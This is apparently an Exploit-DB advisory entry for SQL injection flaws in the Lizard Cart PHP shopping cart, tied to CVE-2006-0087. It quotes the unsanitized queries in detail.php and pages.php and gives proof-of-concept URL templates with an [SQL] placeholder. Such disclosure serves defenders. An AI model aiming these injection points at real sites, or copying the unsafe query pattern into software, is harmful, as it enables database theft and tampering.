Lizard Cart - Multiple SQL Injections

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2009-12-18 
date_updated: 2011-06-28 
verified: 0 
codes: CVE-2006-0087;OSVDB-22200;OSVDB-22199 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comlizardcartpp104.zip

################################################################################
## Exploit Title: Lizard Cart Multiple SQL Injection Exploit                  ##
## Date: 20-12-2009                                                           ##
## Author: cr4wl3r                                                            ##
## Software Link: http://sourceforge.net/projects/lizardcart/                 ##
## Version: N/A                                                               ##
## Tested on: GNU/LINUX                                                       ##
################################################################################


~ Code [detail.php]

$dbResult = mysql_query("select * from products where id='$id'");

~ PoC

[lizardcart_path]/detail.php?id=[SQL]



~ Code [pages.php]

$dbResult = mysql_query("select * from pages where id='$id'");

~ PoC

[lizardcart_path]/pages.php?id=[SQL]